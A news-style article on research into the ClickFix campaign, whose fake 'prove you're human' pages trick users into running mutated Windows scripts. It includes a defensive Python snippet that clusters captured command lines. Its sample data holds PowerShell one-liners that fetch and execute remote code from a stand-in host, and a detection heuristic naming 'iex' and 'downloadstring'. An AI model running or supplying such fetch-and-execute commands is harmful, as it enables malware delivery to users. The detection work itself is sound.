New research has dissected the inner workings of the ClickFix social engineering campaign, exposing a back-end infrastructure that automates the delivery of malware through API-driven servers. The technique, which tricks users into manually executing malicious commands via fake "prove you're human" pages, has evolved into a scalable operation. Investigators analyzed over 3,000 live payloads to map the attack chain.
The campaign's infrastructure assigns each visitor a unique but functionally identical payload, effectively evading signature-based detection. The same analysis also identified a new delivery mechanism designed specifically to slip past Windows script scanning protections. This marks a significant escalation in the threat's capability to remain undetected on compromised systems.
ClickFix lures victims by presenting a captcha-style page that requires the user to paste and run a Windows script. Behind the scenes, an API serves the script with varying identifiers and minor mutations. This makes it difficult for defenders to block or trace individual commands. The research highlights how the attackers have industrialised the obfuscation process.
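As an added illustration (not code from the research or from this article), one way a defender can cope with the per-visitor mutations described above is to normalise captured command lines before matching: strip quoting and casing, replace long opaque tokens with a placeholder, and hash the remaining skeleton so that thousands of superficially unique payloads collapse into one family. The sample command lines, the `example.invalid` host and the identifier values are constructed for this example.

```python
import hashlib
import re

# Constructed sample command lines (not real payloads), modelled on the
# behaviour described above: the same script served with a different
# identifier per visitor plus small cosmetic mutations (case, quoting, spacing).
SAMPLE_COMMANDS = [
    'powershell -w hidden -c "irm https://example.invalid/api/get?id=9f3a1c7e4b2d | iex"',
    'PowerShell  -W Hidden -C "irm https://example.invalid/api/get?id=ab45cd67ef89 | IEX"',
    "powershell -w hidden -c 'irm https://example.invalid/api/get?id=0011aabbccdd | iex'",
    'powershell -c "Get-Date"',  # benign control line
]

# Long hex-only words are treated as per-visitor identifiers (an assumption
# about the token shape, chosen for this example).
TOKEN_RE = re.compile(r"\b[0-9a-f]{8,}\b")
QUOTE_RE = re.compile(r"[\"']")
WS_RE = re.compile(r"\s+")


def normalize(cmd: str) -> str:
    """Reduce a command line to its functional skeleton."""
    s = cmd.lower()                 # case mutations
    s = QUOTE_RE.sub("", s)         # quoting mutations
    s = TOKEN_RE.sub("<ID>", s)     # per-visitor identifiers
    return WS_RE.sub(" ", s).strip()  # whitespace mutations


def family_hash(cmd: str) -> str:
    """Stable identifier for a payload family, independent of the mutations above."""
    return hashlib.sha256(normalize(cmd).encode()).hexdigest()[:16]


def cluster(cmds):
    """Group command lines by family so analysts review one sample per family."""
    groups = {}
    for c in cmds:
        groups.setdefault(family_hash(c), []).append(c)
    return groups


def is_suspicious(cmd: str) -> bool:
    """Heuristic: hidden window plus a remote-fetch-and-execute idiom."""
    n = normalize(cmd)
    return "hidden" in n and any(k in n for k in ("iex", "invoke-expression", "downloadstring"))


if __name__ == "__main__":
    for fam, members in cluster(SAMPLE_COMMANDS).items():
        print(fam, len(members), "suspicious" if is_suspicious(members[0]) else "benign")
```

Run over real endpoint or proxy logs, the family hash is what you alert on and track, while the raw line is kept as evidence.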
Mitigation against these evolving threats typically relies on user education and disabling automatic execution of scripts from untrusted sources. Researchers recommend that organizations tighten PowerShell execution policies and implement application allowlisting. No specific patches or vendor fixes are linked to this campaign, as it exploits user interaction rather than a software vulnerability.
Attribution for the ClickFix network remains unclear, but the sophistication of the API-driven delivery suggests a well-resourced threat actor. The discovery underscores the broader trend where social engineering teams up with invisible delivery layers, making each attack uniquely hard to spot.